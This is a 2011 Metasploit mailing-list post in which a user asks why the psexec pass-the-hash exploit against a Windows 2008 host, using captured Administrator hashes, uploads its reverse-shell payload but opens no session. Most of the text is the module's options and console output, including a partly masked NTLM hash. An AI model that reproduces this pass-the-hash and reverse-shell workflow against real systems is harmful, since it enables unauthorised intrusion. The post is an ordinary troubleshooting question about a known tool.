Metasploit mailing list archives

psexec


From: audio audience <audience099 () gmail com>
Date: Wed, 19 Oct 2011 09:07:51 -0700

Hello All,
I have a remote system. It is running a win2k8 x86 system and I have all the
users' hashes.
However, I ran the psexec exploit but it wasn't successful.

- Disabled antivirus
- Checked regedit key: "RequireSecuritySignature" to "0".
http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash

Do you have any idea about this?

msf  exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOST      [IP Address]                                                   yes       The target address
   RPORT      445                                                            yes       Set the SMB service port
   SHARE      ADMIN$                                                         yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                                                      no        The Windows domain to use for authentication
   SMBPass    aad3bxxxxxxxxxx33435b61404ee:a7649e53c5d07306b78bfc7b2029a798  no        The password for the specified username
   SMBUser    Administrator                                                  no        The username to authenticate as


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     0.0.0.0          yes       The listen address
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(psexec) > exploit

[*] Started reverse handler on 0.0.0.0:4443
[*] Connecting to the server...
[*] Authenticating to [IP Address]:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \uqSjtJEP.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (nGbXrAdw - "MUQefrtYtKijwX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \uqSjtJEP.exe...
[*] Exploit completed, but no session was created.
msf  exploit(psexec) >